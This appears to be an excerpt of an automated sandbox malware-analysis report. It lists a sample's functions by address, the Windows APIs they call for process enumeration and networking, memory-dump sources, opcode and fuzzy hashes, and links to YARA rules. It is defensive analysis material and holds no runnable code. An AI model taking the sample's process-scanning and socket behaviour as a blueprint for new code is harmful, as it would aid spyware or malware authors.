                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 38e3674e072c66414a3e47801c74b9b2d91e92444c2486d094b23d1c3b063979
                                    • Instruction ID: 66bc3bc4b7c4999a29856147a6e74d8ceed1ab60ac9504da224c831848340657
                                    • Opcode Fuzzy Hash: 38e3674e072c66414a3e47801c74b9b2d91e92444c2486d094b23d1c3b063979
                                    • Instruction Fuzzy Hash: CF3104EF29C1117DB10291626F64EFAA76EE6D3730B34883BF806D6553E2C85A4F1471
                                    Function 07450710 Relevance: 1.7, APIs: 1, Instructions: 180COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 06fb3a408980492ed4335584432db6caf05324a7e45b3c2f0f959e399c56c62d
                                    • Instruction ID: bc32d508f6120c352bc90f688b122bd5fc593779d918d248332c3e1bd47088cd
                                    • Opcode Fuzzy Hash: 06fb3a408980492ed4335584432db6caf05324a7e45b3c2f0f959e399c56c62d
                                    • Instruction Fuzzy Hash: 6531E5EF25C1117DB10291612F68EFAA76EE6D3730B34883BF806D6553E2C84A4F5471
                                    Function 074507A2 Relevance: 1.7, APIs: 1, Instructions: 174COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 13ec92663b701f3aa08a63f452b1c4a02c2382498356cb80f6b230ec6348a273
                                    • Instruction ID: aaefd368d5ac2d71a2d1a2bbf9ab6fae44d5fe71b833a4dffc4f7385292b2c76
                                    • Opcode Fuzzy Hash: 13ec92663b701f3aa08a63f452b1c4a02c2382498356cb80f6b230ec6348a273
                                    • Instruction Fuzzy Hash: C93116EF2981117DB14291612B64EFA976EE6D3730B34883BF806D6527E2C84A4F1471
                                    Function 00724950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • gethostname.WS2_32(00000000,00000040), ref: 00724AA5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: gethostname
                                    • String ID:
                                    • API String ID: 144339138-0
                                    • Opcode ID: 1c535207227242e2b023e5a60656156c8d2f34f1cb5946ff4c82c907575cb675
                                    • Instruction ID: 270820a6cde9a401a1709ae77c21b374a5d1911fe11dbbb54330d9cedeb0275e
                                    • Opcode Fuzzy Hash: 1c535207227242e2b023e5a60656156c8d2f34f1cb5946ff4c82c907575cb675
                                    • Instruction Fuzzy Hash: DA51CEB06047608BEB309B35FD4972376E4AF45719F14183CE98A8AAD1E77DEC84CB12
                                    Function 0746024B Relevance: 1.7, APIs: 1, Instructions: 167COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558735439.0000000007460000.00000040.00001000.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7460000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 66e28fb132dd0a3380ebdc3c17999b3b16b58b99749ded8d8af9a87dce46c805
                                    • Instruction ID: b27ae3520410e23fbbee19d890e0ff734d55fe5df6f820d62514728808e3acc5
                                    • Opcode Fuzzy Hash: 66e28fb132dd0a3380ebdc3c17999b3b16b58b99749ded8d8af9a87dce46c805
                                    • Instruction Fuzzy Hash: 253107F719C211BEA24251551B5CEFA6B6FE9D3730B304827F803D6962E3984E8B5033
                                    Function 0745075A Relevance: 1.7, APIs: 1, Instructions: 161COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 52b221d5b682906720c78604a8e3b4fc0ca9a386e935f68399c114681fcc30d6
                                    • Instruction ID: 73b77f8ac7895fa34ded8b0926db8516b2ea32e500c8173536b878e070d144ef
                                    • Opcode Fuzzy Hash: 52b221d5b682906720c78604a8e3b4fc0ca9a386e935f68399c114681fcc30d6
                                    • Instruction Fuzzy Hash: 523148EF29C1117DB10281616F58EFAA72EE6D3730B34883BF802D6563E2C84A4F5471
                                    Function 07450771 Relevance: 1.7, APIs: 1, Instructions: 160COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: bee5b04557f5a13de916cf40d0079278c5fcf8abe7a82e4bee9f72f21ae907e5
                                    • Instruction ID: 5779fd53d155ba210f211a869246a3d45e84e2596aa7dd0f50fb66f4618310a2
                                    • Opcode Fuzzy Hash: bee5b04557f5a13de916cf40d0079278c5fcf8abe7a82e4bee9f72f21ae907e5
                                    • Instruction Fuzzy Hash: D3315CEF25C1117DB14291612F68EFA6B6EE6D3330B34883BF802D6563E6C94A4F1571
                                    Function 074507B4 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 57a6fb68a528f29b225c88267ab35fc449e36c3536ce3b3cd630e82f002a0a3b
                                    • Instruction ID: 0f40dafce275a9d1e15ff02ee19bb21ef19c0e9f2b0cbeea197a63b3e3ca47bf
                                    • Opcode Fuzzy Hash: 57a6fb68a528f29b225c88267ab35fc449e36c3536ce3b3cd630e82f002a0a3b
                                    • Instruction Fuzzy Hash: 742187EF29C2117DB20291612F64EFAA76EE6D3330B34883BF802D6553E6C44A4F51B0
                                    Function 074507E4 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: ae4583947edd95da4b1216d7b97ea02336fecc650373dea9244e1c8d900bf069
                                    • Instruction ID: 0044a09688eebd4071591ea7f40a06100b6e8d79c030c5a9bf3e89caf939427b
                                    • Opcode Fuzzy Hash: ae4583947edd95da4b1216d7b97ea02336fecc650373dea9244e1c8d900bf069
                                    • Instruction Fuzzy Hash: 4E116AEF25C1117DB10290612F64EFA676EE6D3330B35883BF802D6563E6898A0F51B0
                                    Function 0073AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                    Download Yara Rule
                                    APIs
                                    • getsockname.WS2_32(?,?,00000080), ref: 0073AFD1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: getsockname
                                    • String ID:
                                    • API String ID: 3358416759-0
                                    • Opcode ID: e7324f43d57d395f0024c97647befe4e369fee6f74d87e518c7283cbad97ae4a
                                    • Instruction ID: c715ac4642117d6a67714dd0e9a963ee7eac1cdd0b494194fd38ecf2636d9352
                                    • Opcode Fuzzy Hash: e7324f43d57d395f0024c97647befe4e369fee6f74d87e518c7283cbad97ae4a
                                    • Instruction Fuzzy Hash: 49119670808785A5FB268F18D4027F6B3F4EFD0329F109618E5D942151F7769AC58BC2
                                    Function 0073A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0073A97E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: send
                                    • String ID:
                                    • API String ID: 2809346765-0
                                    • Opcode ID: 5187a78d288c2e9025f92619428e4868daa5f217c1138112e04312582573f9c1
                                    • Instruction ID: 94e182d00fd2641ee87ce9c605235b282c73cb4ec0d27a4630484d7e78bc649f
                                    • Opcode Fuzzy Hash: 5187a78d288c2e9025f92619428e4868daa5f217c1138112e04312582573f9c1
                                    • Instruction Fuzzy Hash: 2F01A272B01710AFD6148F25DC46B5AF7A5EF84720F068659EA982B362C331BC108BD1
                                    Function 0073AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WS2_32(?,0073B280,00000000,-00000001,00000000,0073B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0073AF67
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: socket
                                    • String ID:
                                    • API String ID: 98920635-0
                                    • Opcode ID: 1404086c8fac8ef4d9de73f6a69c44726d7827636a83905acd0803612111fea8
                                    • Instruction ID: 9a8dc4576e2da7db1db19229f611e07ef7eb5d0a4f41fb7cb10c048a959dcf24
                                    • Opcode Fuzzy Hash: 1404086c8fac8ef4d9de73f6a69c44726d7827636a83905acd0803612111fea8
                                    • Instruction Fuzzy Hash: FCE0EDB6A092226BD654DB18E8459ABF36DEFC4B20F055A49B89467215C730AC508BE2
                                    Function 074603AA Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(00000027,00000027,?,?), ref: 074603CE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558735439.0000000007460000.00000040.00001000.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7460000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 6edb36fef2dd5c4b1c8f9f36d67966fa5f5263c203bc09e61ea4685ae5ef2c8b
                                    • Instruction ID: 2912e6a882577fc7c3186457a586a229c5663d6791e2362003585b70d646b53e
                                    • Opcode Fuzzy Hash: 6edb36fef2dd5c4b1c8f9f36d67966fa5f5263c203bc09e61ea4685ae5ef2c8b
                                    • Instruction Fuzzy Hash: 40D097F24ACA17EF432876B8434DEFAAA0AA84B312F116C37DC03A6072E30005878083
                                    Function 0073B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    • closesocket.WS2_32(?,00739422,?,?,?,?,?,?,?,?,?,?,?,w3r,00B08640,00000000), ref: 0073B04D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: closesocket
                                    • String ID:
                                    • API String ID: 2781271927-0
                                    • Opcode ID: 916a5f2d9a05ef8c8141c62767a91e4dc31a11804dbef39e93b375ab38d2b5ea
                                    • Instruction ID: 67801aec38355f472b8559fc0d38c4531fc8a5cf2415c43262cee01880bfaeb0
                                    • Opcode Fuzzy Hash: 916a5f2d9a05ef8c8141c62767a91e4dc31a11804dbef39e93b375ab38d2b5ea
                                    • Instruction Fuzzy Hash: B9D0C23470020157DA288A14C8C4A57722B7FC1310FA8CB6CE12C4A152C73FCC43CA01
                                    Function 006D67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                    Download Yara Rule
                                    APIs
                                    • ioctlsocket.WS2_32(?,8004667E,?,?,006AAF56,?,00000001), ref: 006D67FC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: ioctlsocket
                                    • String ID:
                                    • API String ID: 3577187118-0
                                    • Opcode ID: fe8e9517bbf7195085ed5d016926832b6dc402ad58290e35292400245b7b171a
                                    • Instruction ID: fd7d81672d212ed3b44b79f2b11354356f5c918ce99ed8121b6d4dadcf1e78ad
                                    • Opcode Fuzzy Hash: fe8e9517bbf7195085ed5d016926832b6dc402ad58290e35292400245b7b171a
                                    • Instruction Fuzzy Hash: 15C012F1118601AFC6088714D865A6F76E8DB85355F01581CB04681180EA709990CA16
                                    Function 006731D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: 4662233d5e0932fd387c8ef262138e2073c6c5d9c7d76dc6a89f3ed4a651e042
                                    • Instruction ID: b1895c36803dffd4d79e76c6f6e20cc51c63872e6241c53a0446c6dbcee3df90
                                    • Opcode Fuzzy Hash: 4662233d5e0932fd387c8ef262138e2073c6c5d9c7d76dc6a89f3ed4a651e042
                                    • Instruction Fuzzy Hash: 8031B7B09143189FCB00EFB4D6456AEBBF1AF44304F00886DE999A7351E7349A44CF92
                                    Function 07400B45 Relevance: .0, Instructions: 38COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558531809.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7400000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 16f1ba4b9c7740631960009fa46faec3d2b8926816e2751f8f5b0bc493363df7
                                    • Instruction ID: 836b7f8d7aea8885f1804563da7c46d952e879be058776ac36e3dd71dc3cd51a
                                    • Opcode Fuzzy Hash: 16f1ba4b9c7740631960009fa46faec3d2b8926816e2751f8f5b0bc493363df7
                                    • Instruction Fuzzy Hash: 27F0F6E280C3889AC72796C446143F83EB25B17229F3504FBC8126B2A3D2E40E469395
                                    Function 07400B33 Relevance: .0, Instructions: 35COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558531809.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7400000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6817252d5f6af6302e430c64cceb6c548d662b50f0fb9e91e3ac7ec923d25cea
                                    • Instruction ID: e8e0ffbe9044468d13a1d0022599249ad90e1e0755bac925be3788898486ce23
                                    • Opcode Fuzzy Hash: 6817252d5f6af6302e430c64cceb6c548d662b50f0fb9e91e3ac7ec923d25cea
                                    • Instruction Fuzzy Hash: 90F0A7E751835CEA860B96C486407F93DB35B57176F3200FBD813B72A25AF00D4696E8

                                    Non-executed Functions

                                    Function 006B1BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
